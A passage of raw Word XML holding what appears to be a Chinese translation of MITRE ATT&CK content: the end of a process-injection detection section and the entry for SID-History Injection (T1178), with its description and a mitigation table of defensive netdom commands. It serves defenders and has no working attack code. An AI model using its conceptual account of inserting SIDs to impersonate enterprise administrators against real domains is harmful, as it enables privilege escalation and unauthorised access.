        <w:t>调用，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ptrace</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统调用、环境变量</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>LD_PRELOAD</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>使用，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dlfcn</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>动态链接</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用，应该不会生成大量数据。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>这种</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控可以很有效地检测某些常见进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>注入</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A1FF65" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控命名管道创建和连接事件（事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），获取外部模块感染进程的指示信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CF7F2A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>和命令行参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码注入前后可能执行的操作，并将检测</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>到的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息与相关事件信息关联起来。攻击者也</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>PowerSploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>工具</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:t>通过</w:t>
      </w:r>
      <w:hyperlink r:id="rId99" w:history="1">
        <w:r w:rsidRPr="00AF6363">
          <w:t>PowerShell</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:t>执行代码注入</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。因此可能还需要监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来检测这种</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>注入行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4E2DF2" w14:textId="24DB148E" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>SID</w:t>
      </w:r>
      <w:r w:rsidRPr="009B64D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00A37D8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="00A37D8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">istory </w:t>
      </w:r>
      <w:r w:rsidRPr="009B64D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="533BACDC" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="314585E4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00595E84" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00595E84">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00595E84">
              <w:t xml:space="preserve"> T1178</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="532E41BC" w14:textId="6FEF7BE4" w:rsidR="000F2665" w:rsidRPr="00595E84" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00595E84">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00595E84">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00DE009F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>权限升级</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="309CB532" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00595E84" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00595E84">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00595E84">
              <w:t xml:space="preserve"> Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06E00839" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00595E84" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00595E84">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00595E84">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00595E84">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
            <w:r w:rsidRPr="00595E84">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00595E84">
              <w:t>系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BA82A01" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00595E84" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00595E84">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00595E84">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> API</w:t>
            </w:r>
            <w:r w:rsidRPr="00595E84">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控，认证日志，</w:t>
            </w:r>
            <w:r w:rsidRPr="00595E84">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00595E84">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>事件日志</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D604426" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00595E84" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00595E84">
              <w:t>贡献者</w:t>
            </w:r>
            <w:r w:rsidRPr="00595E84">
              <w:t>: Vincent Le Toux; Alain Homewood, Insomnia Security</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51235333" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00595E84">
              <w:t>版本：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="33634BE4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665"/>
    <w:p w14:paraId="036326C0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>安全标识符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>SID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>是标识用户或组帐户的唯一值。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>安全在安全描述符和访问令牌中使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> SID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>。帐户可以在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> SID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>历史记录活动目录属性中保留其他</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> SID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>，允许域之间可操作的帐户迁移（例如，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">SID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>历史记录中的所有值都包含在访问令牌中）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD23AB7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>攻击者可能使用此机制进行权限升级。使用域管理员（或等效）权限时，可以将已收集或已知的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> SID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>值插入到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> SID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>历史记录中，以便模拟任意用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>组（如企业管理员）。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A42EC8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此操作可</w:t>
      </w:r>
      <w:r w:rsidRPr="00A42EC8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>能导致对本地资源的访问提升和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A42EC8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A42EC8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或通过诸如远程服务，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A42EC8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00A42EC8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>管理员共享或</w:t>
      </w:r>
      <w:r w:rsidRPr="00A42EC8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00A42EC8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程管理之类的横向移动技术访问其他不可访问的域。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55234357" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A42EC8" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44DB37AC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2294"/>
        <w:gridCol w:w="7442"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00AF6363" w14:paraId="7E0CD852" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="28F39DDF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="24FC4C6E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="6FF85767" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DD3C31D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A42EC8">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>活动目录配置</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FF11D28" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E96CB7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>合法帐户迁移完成后，清理</w:t>
            </w:r>
            <w:r w:rsidRPr="00E96CB7">
              <w:t xml:space="preserve"> SID </w:t>
            </w:r>
            <w:r w:rsidRPr="00E96CB7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>历史记录属性。请考虑将</w:t>
            </w:r>
            <w:r w:rsidRPr="00E96CB7">
              <w:t xml:space="preserve"> SID </w:t>
            </w:r>
            <w:r w:rsidRPr="00E96CB7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>筛选应用于林间信任（如林信任和外部信任），以从访问域资源的请求中排除</w:t>
            </w:r>
            <w:r w:rsidRPr="00E96CB7">
              <w:t xml:space="preserve"> SID </w:t>
            </w:r>
            <w:r w:rsidRPr="00E96CB7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>历史记录。</w:t>
            </w:r>
            <w:r w:rsidRPr="00E96CB7">
              <w:t xml:space="preserve">SID </w:t>
            </w:r>
            <w:r w:rsidRPr="00E96CB7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>筛选可确保信任上的任何身份验证请求仅包含来自受信任域的安全主体的</w:t>
            </w:r>
            <w:r w:rsidRPr="00E96CB7">
              <w:t xml:space="preserve"> SID</w:t>
            </w:r>
            <w:r w:rsidRPr="00E96CB7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（即防止受信任域声明用户在域外的组中具有成员资格）。默认情况下启用林信任的</w:t>
            </w:r>
            <w:r w:rsidRPr="00E96CB7">
              <w:t xml:space="preserve"> SID </w:t>
            </w:r>
            <w:r w:rsidRPr="00E96CB7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>筛选，但在某些情况下可能已禁用，以允许子域通过传输访问林信任。使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00E96CB7">
              <w:t xml:space="preserve"> Server 2003 </w:t>
            </w:r>
            <w:r w:rsidRPr="00E96CB7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或更高版本的域控制器，在所有创建的外部信任上自动启用外部信任的</w:t>
            </w:r>
            <w:r w:rsidRPr="00E96CB7">
              <w:t xml:space="preserve"> SID </w:t>
            </w:r>
            <w:r w:rsidRPr="00E96CB7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>筛选。但是请注意，</w:t>
            </w:r>
            <w:r w:rsidRPr="00E96CB7">
              <w:t xml:space="preserve">SID </w:t>
            </w:r>
            <w:r w:rsidRPr="00E96CB7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>筛选不会自动应用于旧版信任，或者可能已被故意禁用以允许域间访问资源。</w:t>
            </w:r>
            <w:r w:rsidRPr="00E96CB7">
              <w:t xml:space="preserve">SID </w:t>
            </w:r>
            <w:r w:rsidRPr="00E96CB7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>筛选可以应用：</w:t>
            </w:r>
            <w:r w:rsidRPr="00E96CB7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:i/>
              </w:rPr>
              <w:t>使用网络工具（在域控制器上：</w:t>
            </w:r>
            <w:r w:rsidRPr="00E96CB7">
              <w:rPr>
                <w:i/>
              </w:rPr>
              <w:t>netdom trust /domain: /EnableSIDHistory:no</w:t>
            </w:r>
            <w:r w:rsidRPr="00E96CB7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:i/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
            <w:r w:rsidRPr="00E96CB7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。使用网络工具对外部信任应用</w:t>
            </w:r>
            <w:r w:rsidRPr="00E96CB7">
              <w:t xml:space="preserve"> SID </w:t>
            </w:r>
            <w:r w:rsidRPr="00E96CB7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>筛选器隔离（在域控制器上</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:sz w:val="24"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
              </w:rPr>
              <w:t>netdom trust/domain:/quarantine:yes</w:t>
            </w:r>
            <w:r w:rsidRPr="00A42EC8">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:sz w:val="24"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
            <w:r w:rsidRPr="00A42EC8">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="39434C"/>
                <w:sz w:val="24"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r w:rsidRPr="00E96CB7">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E96CB7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>不建议对单个林中的域信任应用</w:t>
            </w:r>
            <w:r w:rsidRPr="00E96CB7">
              <w:t xml:space="preserve"> SID </w:t>
            </w:r>
            <w:r w:rsidRPr="00E96CB7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>筛选，因为它是不受支持的配置，并可能导致重大更改。如果林中的域不可信，则它不应是林的成员。在此情况下，必须首先将受信任的和不受信任的域拆分为单独的林，其中</w:t>
            </w:r>
            <w:r w:rsidRPr="00E96CB7">
              <w:t xml:space="preserve"> SID </w:t>
